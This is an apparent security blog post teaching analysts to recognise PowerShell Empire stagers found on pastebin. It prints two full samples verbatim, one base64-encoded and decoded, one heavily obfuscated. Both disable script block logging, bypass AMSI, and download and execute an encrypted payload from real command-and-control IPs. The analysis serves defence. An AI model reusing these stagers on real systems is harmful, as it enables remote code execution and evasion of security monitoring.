Powershell that looks & smells like Empire Payloads
Today we found the following powershell Proof of Concept (PoC) on pastebin.com, we immediately recognised this as an Empire payload. The junior analysts in the team where shocked that we could quickly call this out. So we showed them some key points to consider, that allows you to quickly analyse these kinds of PoC’s within 30 seconds.
The sample
https://pastebin.com/raw/tTMzK8YG
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAGEAYgBsAEUALgBQAFMAVgBlAFIAcwBpAE8ATgAuAE0AYQBKAE8AcgAgAC0ARwBlACAAMwApAHsAJABHAFAAUwA9AFsAUgBlAEYAXQAuAEEAUwBTAEUAbQBiAGwAeQAuAEcAZQB0AFQAWQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkAZQBgAEwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4ARwBFAHQAVgBBAEwAdQBFACgAJABuAHUATABsACkAOwBJAGYAKAAkAEcAUABTAFsAJwBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AKQB7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AMAA7ACQARwBQAFMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQBbACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnAF0APQAwAH0ARQBMAFMAZQB7AFsAUwBjAFIAaQBQAHQAQgBsAG8AYwBrAF0ALgAiAEcARQB0AEYASQBlAGAAbABkACIAKAAnAHMAaQBnAG4AYQB0AHUAcgBlAHMAJwAsACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAGUAdABWAGEAbAB1AEUAKAAkAE4AVQBsAGwALAAoAE4ARQBXAC0ATwBCAEoARQBjAHQAIABDAG8AbABMAGUAQwB0AGkAbwBuAFMALgBHAEUATgBFAFIASQBjAC4ASABhAFMASABTAEUAVABbAHMAdAByAEkAbgBnAF0AKQApAH0AWwBSAEUARgBdAC4AQQBzAFMAZQBtAGIAbABZAC4ARwBlAFQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAdABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQBUAFYAYQBsAFUARQAoACQAbgBVAGwATAAsACQAVABSAHUARQApAH0AOwB9ADsAWwBTAFkAUwB0AEUAbQAuAE4AZQB0AC4AUwBlAFIAVgBJAGMARQBQAG8ASQBOAFQATQBhAG4AYQBHAEUAcgBdADoAOgBFAFgAUABFAEMAVAAxADAAMABDAE8AbgB0AGkAbgBVAGUAPQAwADsAJAB3AGMAPQBOAEUAVwAtAE8AQgBqAEUAQwB0ACAAUwB5AHMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAEMATABJAEUATgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBDAC4AUAByAE8AeABZAD0AWwBTAFkAUwB0AGUAbQAuAE4ARQB0AC4AVwBFAGIAUgBFAHEAdQBlAHMAdABdADoAOgBEAEUAZgBhAFUAbAB0AFcAZQBiAFAAcgBvAHgAWQA7ACQAdwBjAC4AUAByAG8AWABZAC4AQwBSAEUARABlAG4AVABJAEEATABTACAAPQAgAFsAUwBZAFMAdABFAG0ALgBOAEUAVAAuAEMAcgBlAEQARQBOAHQAaQBBAGwAQwBhAGMASABFAF0AOgA6AEQARQBmAGEAdQBMAFQATgBFAFQAdwBPAHIAawBDAHIARQBkAGUATgBUAGkAYQBsAFMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAUwBUAGUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAEQAaQBOAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAFQAQgBZAFQAZQBTACgAJwA2ADcANwAzADMANgA0ADgANwAzADEAMwBjAGEANQA2AGMAMgA1ADMANAA1AGQAZgBiAGIANgA0ADUAMAA0ADEAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAFMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBOAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAG8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJABzAGUAcgA9ACcAaAB0AHQAcAA6AC8ALwAxADYANQAuADIAMgA3AC4AMQA1ADcALgAxADYAOAA6ADgAMQAnADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBDAC4ASABFAEEARABlAFIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ASQB1AFEAZABWAFAAeABYADUAbwBlAC8AUgB2AEMAOQBEADUAbgBaAGgAVQBkAEUASQBNAE0APQAiACkAOwAkAEQAQQB0AEEAPQAkAFcAQwAuAEQAbwBXAE4ATABPAEEARABEAGEAdABhACgAJABTAGUAUgArACQAVAApADsAJABpAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAGEAPQAkAGQAYQB0AEEAWwA0AC4ALgAkAGQAYQBUAGEALgBMAEUATgBHAHQASABdADsALQBqAG8ASQBuAFsAQwBoAEEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
You can either use either or the following commands to decode base64 strings:
Windows:
certutil /decode [base64 infile] [base64 outfile]
Linux:
base64 -d [base64 infile]
or you can choose to use an online platform such as http://gchq.github.io/CyberChef/
Sidenote: When downloading this base64 sample onto our Windows 10 sandbox Windows Defender immediately identifies as PowerMeterpreter
Base64 decoded Sample
IF($PSVeRSIoNTablE.PSVeRsiON.MaJOr -Ge 3){$GPS=[ReF].ASSEmbly.GetTYpE(‘System.Management.Automation.Utils’).”GetFIe`LD”(‘cachedGroupPolicySettings’,’N’+’onPublic,Static’).GEtVALuE($nuLl);If($GPS[‘ScriptB’+’lockLogging’]){$GPS[‘ScriptB’+’lockLogging’][‘EnableScriptB’+’lockLogging’]=0;$GPS[‘ScriptB’+’lockLogging’][‘EnableScriptBlockInvocationLogging’]=0}ELSe{[ScRiPtBlock].”GEtFIe`ld”(‘signatures’,’N’+’onPublic,Static’).SetValuE($NUll,(NEW-OBJEct ColLeCtionS.GENERIc.HaSHSET[strIng]))}[REF].AsSemblY.GeTTYpe(‘System.Management.Automation.AmsiUtils’)|?{$_}|%{$_.GetFIelD(‘amsiInitFailed’,’NonPublic,Static’).SeTValUE($nUlL,$TRuE)};};[SYStEm.Net.SeRVIcEPoINTManaGEr]::EXPECT100COntinUe=0;$wc=NEW-OBjECt SysTEm.Net.WebCLIENT;$u=’Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko’;$WC.HEaDErs.ADD(‘User-Agent’,$u);$WC.PrOxY=[SYStem.NEt.WEbREquest]::DEfaUltWebProxY;$wc.ProXY.CREDenTIALS = [SYStEm.NET.CreDENtiAlCacHE]::DEfauLTNETwOrkCrEdeNTialS;$Script:Proxy = $wc.Proxy;$K=[SYSTem.TeXT.EnCoDiNg]::ASCII.GETBYTeS(‘677336487313ca56c25345dfbb645041’);$R={$D,$K=$ARgS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CouNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$ser=’http://165.227.157.168:81';$t='/admin/get.php';$wC.HEADeRs.Add("Cookie","session=IuQdVPxX5oe/RvC9D5nZhUdEIMM=");$DAtA=$WC.DoWNLOADData($SeR+$T);$iV=$DatA[0..3];$daTa=$datA[4..$daTa.LENGtH];-joIn[ChAr[]](& $R $DaTa ($IV+$K))|IEX
Looks like Empire smells like Empire because…
The following pages are very common for Empire listeners:
- /admin/get.php
- /admin/news.php
- /login/process.php
http://165.227.157.168:81/admin/get.php
Simple whois query reveals the hosting provider is Digital Ocean, a favourite cloud hosting provider for penetration testers and red-teamers:
$whois 165.227.157.168 NetRange: 165.227.0.0–165.227.255.255 CIDR: 165.227.0.0/16 NetName: DIGITALOCEAN-19 NetHandle: NET-165–227–0–0–1 NetType: Direct Allocation Organization: DigitalOcean, LLC (DO-13)
Grabbing the HTTP headers also reveals an important piece of information as Empire’s Server Header defaults to IIS/7.5, and expiry header equals 0. See below:
$whois 165.227.157.168 $ nc 165.227.157.168 81 HEAD / HTTP/1.0 200 OK Content-Type: text/html Content-Length: 233 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: Microsoft-IIS/7.5
Conclusion
That is how we were able to determine so quickly that this PoC is an Empire payload; What helped us in the past is experience with the Empire framework, testing and researching modules against our own systems. An important factor in this example is that the attackers/red-teamers did very little to obfuscate or change the default settings! Making our analysis an easy effort.
- PowershellEmpire Logo is from https://www.powershellempire.com/
Update 2018–01–15: Obfuscate to the Max!!!
Spotted a slightly more obscure sample on pastebin https://pastebin.com/jB4jJFHe
start /b CMd /c “SEt Vdl= ^&(“{0}{1}{2}” -f’Se’,’T-iTE’,’m’) (“vaR”+”Ia”+”BLE:1kzW”) ([TYpe](“{2}{0}{1}” -F ‘PtblOC’,’K’,’SCRi’)) ;.(“{2}{1}{0}”-f’eM’,’T-It’,’se’) (“vAr”+”IaB”+”LE:”+”P”+”3Qk”) ( [TYPe](“{1}{0}” -f’eF’,’R’) ) ; .(“{2}{0}{1}”-f ‘T’,’-ITem’,’sE’) (“vaRiA”+”BL”+”E:K”+”zGw”) ( [TyPe](“{1}{3}{2}{6}{5}{0}{4}{7}” -f ‘pOinTMaN’,’sYS’,’nE’,’TEm.’,’aG’,’.sErViCE’,’T’,’ER’) ) ; $9bX =[tYPE](“{2}{1}{4}{3}{0}” -F ‘BRequesT’,’YstE’,’s’,’net.we’,’m.’) ; .(“{1}{0}”-f ‘eT’,’S’) NujPlG ( [tYpe](“{1}{6}{4}{2}{0}{3}{5}” -f’CreDE’,’SYStE’,’et.’,’NTi’,’.n’,’aLCACHe’,’m’) ) ; $37B9 =[tyPE](“{0}{3}{1}{2}”-F ‘SySTE’,’tEXt.ENc’,’ODING’,’M.’) ;IF(${PsVeRs`iONt`ABLe}.”PsVeR`SI`oN”.”M`AjOr” -gE 3){${G`Ps}= ( .(“{2}{1}{0}” -f ‘TEm’,’I’,’get-’) (‘vARI’+’AB’+’Le:P3qk’) ).ValUE.”a`S`sEMBlY”.(“{0}{2}{1}” -f’GE’,’PE’,’tTY’).Invoke((“{4}{8}{1}{7}{5}{0}{2}{3}{6}” -f ‘Automation.’,’an’,’Uti’,’l’,’Syste’,’nt.’,’s’,’ageme’,’m.M’)).”GEtFiE`lD”((“{0}{7}{3}{1}{4}{6}{2}{5}”-f ‘c’,’p’,’g’,’dGrou’,’Policy’,’s’,’Settin’,’ache’),’N’+(“{3}{1}{0}{2}”-f’ic,’,’nPubl’,’Static’,’o’)).(“{2}{1}{0}”-f ‘E’,’eTValU’,’G’).Invoke(${Nu`LL});IF(${g`Ps}[(“{0}{2}{1}” -f ‘Sc’,’tB’,’rip’)+(“{1}{3}{2}{0}” -f’g’,’lockL’,’ggin’,’o’)]){${G`PS}[(“{1}{0}” -f ‘ptB’,’Scri’)+(“{2}{1}{0}” -f ‘ng’,’Loggi’,’lock’)][(“{3}{2}{1}{0}”-f’B’,’Script’,’le’,’Enab’)+(“{1}{0}{2}”-f ‘ckLoggin’,’lo’,’g’)]=0;${G`ps}[(“{0}{1}{2}”-f ‘S’,’crip’,’tB’)+(“{0}{3}{1}{2}”-f ‘l’,’ckLoggin’,’g’,’o’)][(“{5}{1}{3}{4}{2}{0}” -f ‘g’,’n’,’ggin’,’ableScriptBl’,’ockInvocationLo’,’E’)]=0}ElsE{ ( .(“{2}{0}{1}” -f ‘-i’,’Tem’,’geT’) (“VaR”+”Ia”+”bLe:1kzW”) ).vaLuE.”GetFIE`lD”((“{2}{1}{0}”-f ‘es’,’r’,’signatu’),’N’+(“{0}{3}{2}{1}”-f’on’,’ic,Static’,’bl’,’Pu’)).”sE`TvAlue”(${Nu`lL},(.(“{1}{0}{2}” -f’eW’,’N’,’-Object’) (“{6}{8}{7}{0}{1}{3}{9}{5}{4}{2}” -f ‘cTi’,’oNS.GeNE’,’]’,’R’,’hSet[StRIng’,’S’,’CO’,’e’,’LL’,’ic.HA’)))} $P3QK.”A`SsE`MBlY”.(“{0}{1}{2}” -f ‘Ge’,’T’,’TyPe’).Invoke((“{6}{9}{5}{7}{10}{4}{3}{1}{8}{0}{2}” -f ‘ms’,’i’,’iUtils’,’mat’,’.Auto’,’st’,’S’,’em.Manageme’,’on.A’,’y’,’nt’))^|.(‘?’){${_}}^|.(‘%’){${_}.(“{0}{2}{1}” -f’G’,’FIELD’,’et’).Invoke((“{0}{2}{1}” -f ‘a’,’nitFailed’,’msiI’),(“{2}{0}{1}{3}”-f’c,S’,’tat’,’NonPubli’,’ic’)).(“{0}{1}”-f’SeTV’,’ALUE’).Invoke(${N`ULl},${T`RUe})};}; $kZgW::”E`x`pEct100cO`N`TInUE”=0;${wc}=^&(“{0}{1}{2}” -f ‘NE’,’W’,’-ObJECt’) (“{1}{0}{3}{4}{2}”-f’yst’,’S’,’t’,’Em.NET.WebCLIe’,’n’);${U}=(“{12}{6}{8}{2}{14}{1}{7}{10}{15}{0}{9}{5}{4}{16}{3}{11}{13}”-f ‘1; WOW64; Trident/’,’i’,’la’,’ G’,’ rv’,’.0;’,’z’,’n’,’il’,’7',’dows NT ‘,’e’,’Mo’,’cko’,’/5.0 (W’,’6.’,’:11.0) like’);${wc}.”HEa`De`Rs”.(“{0}{1}” -f’Ad’,’D’).Invoke((“{1}{2}{0}{3}” -f ‘en’,’User’,’-Ag’,’t’),${u});${wc}.”pro`XY”= ( ^&(“{1}{0}” -f ‘Et-ItEm’,’g’) VaRiabLe:9Bx).vaLUe::”D`E`FaUltWebPR`o`XY”;${wc}.”P`ROxy”.”Credent`i`ALs” = (.(“{3}{2}{1}{0}” -f’tEM’,’ildI’,’T-Ch’,’GE’) VARiABLE:nujPlG ).valUE::”De`FA`UlT`NETwoRkC`RE`deNt`IALS”;${SCrIp`T`:p`RoXy} = ${W`c}.”p`ROXy”;${k}= ( ^&(“{2}{0}{1}” -f ‘-VARIa’,’blE’,’GET’) (‘3’+’7b9') -VALueonly )::”As`CII”.(“{2}{0}{1}” -f’eT’,’BYtEs’,’G’).Invoke(‘SFE)[Uf#GWB^<]{m=/thRxp;46YHbavn~’);${R}={${d},${K}=${ar`GS};${s}=0..255;0..255^|.(‘%’){${J}=(${j}+${S}[${_}]+${k}[${_}%${K}.”C`OUNt”])%256;${S}[${_}],${s}[${J}]=${s}[${J}],${S}[${_}]};${D}^|.(‘%’){${i}=(${I}+1)%256;${H}=(${H}+${S}[${I}])%256;${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];${_}-BXOR${S}[(${s}[${i}]+${S}[${H}])%256]}};${s`er}=(“{5}{3}{2}{4}{6}{1}{0}” -f’4445',’.59.85:’,’/1',’:/’,’94.6',’http’,’8');${t}=(“{2}{1}{3}{0}{4}{5}” -f ‘c’,’login’,’/’,’/pro’,’ess.ph’,’p’);${Wc}.”h`e`ADERS”.(“{1}{0}” -f’DD’,’A’).Invoke((“{2}{0}{1}” -f ‘o’,’okie’,’C’),(“{4}{8}{0}{5}{7}{2}{6}{3}{9}{1}” -f’=Q76eu’,’RirqkGw=’,’v’,’E’,’sessi’,’tS’,’2nZ5',’DW’,’on’,’m8DJE’));${da`TA}=${WC}.(“{0}{1}{2}”-f’DoWnlO’,’adDa’,’TA’).Invoke(${S`eR}+${t});${Iv}=${Da`TA}[0..3];${D`ATa}=${d`Ata}[4..${D`Ata}.”leN`GTh”];-jOIn[ChAR[]](^& ${r} ${da`TA} (${I`V}+${K}))^|.(“{1}{0}”-f’EX’,’I’)&& sEt avx=eCho iNvOKE-EXpreSsioN (ITEM env:vDl).VaLue ^| POweRSHElL -NOPROFiLE -NOe -NOninTErAc -wiNd hIdDEn -execu BYpASS -&& CMd /c%avX%” start /b “” cmd /c del “%~f0”&exit /b
To decode this sample the numbers in brackets tell you the order of the following string. Eg.
“{5}{3}{2}{4}{6}{1}{0}” -f’4445',’.59.85:’,’/1',’:/’,’94.6',’http’,’8'
Becomes:
- http://194.68.59.85:4445
Share on: